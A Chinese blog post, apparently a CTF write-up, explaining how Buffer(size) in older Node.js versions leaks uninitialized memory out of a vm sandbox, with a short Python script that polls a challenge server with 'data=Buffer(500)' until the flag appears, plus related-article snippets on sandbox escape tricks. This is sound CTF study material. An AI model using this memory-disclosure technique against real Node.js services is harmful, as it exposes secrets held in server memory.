Node.js8.0沙箱逃逸问题

最新推荐文章于 2023-08-03 22:13:43 发布
最新推荐文章于 2023-08-03 22:13:43 发布
阅读量346 收藏
点赞数
文章标签: node.js 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53099802/article/details/125101520
版权

看不是很懂先记录下来NodeJS沙箱逃逸分析 - 安全客,安全资讯平台

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函
数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这
个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数
Buffer.allocUnsafe(size) 来获得未清空的内存。

实例:攻防世界leaking

进入页面,代码审计

flag以变量存在沙箱中。buffer可以直接读取沙箱内容

所以可以构造:

注意文件编码的声明,不然可能显示不出来。

# encoding=utf-8
import requests
import time
url = 'http://111.200.241.244:49358?data=Buffer(500)'  (为自己网页的URL)
response = ''
while 'flag' not in response:
    req = requests.get(url)
    response = req.text
    print(req.status_code)
    time.sleep(0.1)
    if 'flag{' in response:
        print(response)
        break

在kali中运行

成功获取flag

flag{4nother_h34rtbleed_in_n0dejs}

 

托物言志
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈Node.js 沙箱环境
10-18
本篇文章主要介绍了Node.js 沙箱环境 ,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Node.js应用设置安全沙箱环境
10-18
主要介绍了Node.js应用设置安全沙箱环境的方法以及注意事项,对此有需要的朋友可以参考学习下。
Node.js-Sandbox:我的 Node.JS 沙箱
06-20
欢迎来到 Node.js Gabriel 的沙箱! 这是我在这里使用的东西(每当我开始使用/学习一个新模块时,我都会更新这个部分): node.js (v0.12.0) npm (v2.5.1) 快递 (v4.12.0) mongoDB (v2.6.8) 猫鼬 (v3.8.24) 我已使用此内容作为参考来构建您在此处看到的内容: 这个: 虽然作者从未完成它,但它可以让你很好地了解它是如何工作的。 这个:解释了什么是 express 并展示了它是如何工作的,是对 express 的一个很好的介绍。 这个:它介绍了 mongoDB,是将所有概念付诸实践的好方法。 指南:它概括介绍了 Mongoose。 这个 :它展示了如何在 express 中实现 mongoose,它真的很旧,但我可以设法使其适应当前版本的 express(真的很有帮助)。 此:当我需要手动检查数据
nodeLearning:一个node.js学习沙箱
05-18
在我学习节点Web框架时,这些是一些基本的node.js Web应用程序。 大多数代码都来自于教程,例如的精彩的 。
Nodejs沙箱逃逸
m0_66022305的博客
08-03 223
我们在沙盒中定义一个函数并返回,在沙盒外这个函数被调用,那么此时的arguments.callee.caller就是沙盒外的这个调用者,我们再通过这个调用者拿到它的constructor等属性,就可以绕过沙箱了。在 JavaScript 中,this 关键字的值取决于函数的执行上下文。因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的。
Noder-简单的基于Docker的NodeJS沙箱
08-10
Noder -简单的,基于Docker的NodeJS沙箱。用于测试代码并包含一个编辑器
Node.js沙箱逃逸
shawdow_bug的博客
09-02 1753
什么是沙箱(sandbox) 在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。 沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险。 沙箱技术的实现 & node.js 沙箱技术按照设定的安全策略,限制不可信程序对系统资源的使用来实现,那么就要在访问系统资源之前将程序的系统调
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 1973
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
NodeJS沙箱
weixin_30834019的博客
01-28 115
NodeJS沙箱 转载于:https://www.cnblogs.com/motadou/archive/2013/01/28/2879960.html
[HITCON 2016]Leaking-nodejsVM沙箱逃逸
cjdgg的博客
08-19 632
[HITCON 2016]Leaking 最近想学下nodejs相关的题目,所以去buu上又找了一道来做 进入题目后如上图所示,直接给出了源代码,老样子,拿出之前收藏的nodejs相关安全问题来对比着看看,我发现这里用了VM沙箱,那最有可能考的就是VM逃逸了 emem由于之前没做过,说实话,光看这个完全不知道该怎么做,还是老实找个大佬的WP来看看吧 那我们先来分析下代码,下面这段代码是整道题的核心 /* Orange is so kind so he put the flag here. But
nodejs-沙箱
03-04
参考: : Nodejs沙箱 安装 打开cmd并输入'node -v'来检查您的计算机是否安装了nodejs。 如果不是,请在这里下载并安装Node js。 运行节点程序 转到您的项目目录,并在cmd中写入节点{ur_js_fileName} 创建服务器并侦听请求 const http = require('http'); // Create a server const server = http.createServer((req, res) => { console.log("Request is made!"); }); //listen for request server.listen(3000, 'localhost', ()=>{ console.log("Server is created!"); }); 返回回复 const http = requi
nodejs-sandbox:对我和nodejs来说也是一个沙箱
02-14
nodejs-沙箱
Nodejs沙箱绕过
weixin_54347738的博客
08-03 173
A:因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的,但是,如果修改下context:{m: [], n: {}, x: /regexp/},这样m、n、x就都可以利用了。创建完两个空文件夹之后,跟之前操作一样,在键盘按下【win+R】键,输入cmd,然后回车,打开命令行界面,输入下面命令,如图。
Node.js 沙箱环境
ALLEN'Blog
01-11 438
vm提供了一种隔离的方式来执行不可信代码,但是并不是非常彻底,针对不可信代码最好的执行方式还是“物理隔离”,比如docker容器。
node.js 沙盒逃逸分析
凹凸实验室
10-30 1006
作者: 凹凸曼 - nobo 背景 日常开发需求中有时候为了追求灵活性或降低开发难度,会在业务代码里直接使用 eval/Function/vm 等功能,其中 eval/Function 算是动态执行 JS,但无法屏蔽当前执行环境的上下文,但 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。 vm 基本介绍 vm 模块可在 V8 虚拟机上下文中编译和运行代码,虚拟机上下文可自行配置,利用该特性做到沙盒的效果。例如: const vm = .
利用内存破坏实现Python沙盒逃逸
weixin_33805992的博客
11-01 257
几周之前心痒难耐的我参与了一段时间的漏洞赏金计划。业余这个漏洞赏金游戏最艰巨的任务就是挑选一个能够获得最高回报的程序。不久我就找到一个存在于Python沙盒中执行的用户提交代码的Web应用程序的bug,这看起来很有趣,所以我决定继续研究它。 进过一段时间的敲打之后,我发现了在Python层实现沙盒逃逸的方法。报告归档了,漏洞几天内及时被修复,得到了一笔...
Node.js 应用建立一个更安全沙箱环境
weixin_34185512的博客
04-23 135
有哪些动态执行脚本的场景? 在一些应用中,我们希望给用户提供插入自定义逻辑的能力,比如 Microsoft 的 Office 中的 VBA,比如一些游戏中的 lua 脚本,FireFox 的「油猴脚本」,能够让用户发在可控的范围和权限内发挥想象做一些好玩、有用的事情,扩展了能力,满足用户的个性化需求。 大多数都是一些客户端程序,在一些在...
nodejs沙箱逃逸
最新发布
09-11
node.js沙箱逃逸是指攻击者利用特定的漏洞或技术手段,成功越过node.js沙箱限制,实现对主机环境的非法操作或访问。在node.js中,沙箱被用来隔离有害程序,防止其影响到主机环境。通过沙箱,可以将程序与程序之间、程序与主机之间互相分隔开。 具体来说,沙箱逃逸利用的是node.js中的漏洞或不当的配置,使攻击者能够绕过沙箱的限制,执行恶意代码或访问敏感资源。攻击者可能通过构造精心设计的输入,触发沙箱漏洞,从而获得对主机环境的不受限制的访问权限。 为了防止沙箱逃逸,需要及时更新node.js版本,以修复已知的漏洞。此外,也可以采取其他安全措施,如限制代码的执行权限,限制访问敏感资源的权限等。同时,编写安全的代码也是非常重要的,避免在代码中存在漏洞可供攻击者利用。 总结来说,node.js沙箱逃逸是指攻击者利用漏洞或技术手段,成功绕过node.js沙箱限制,实现对主机环境的非法操作或访问。为了防止沙箱逃逸,需要及时更新node.js版本,采取其他安全措施,并编写安全的代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值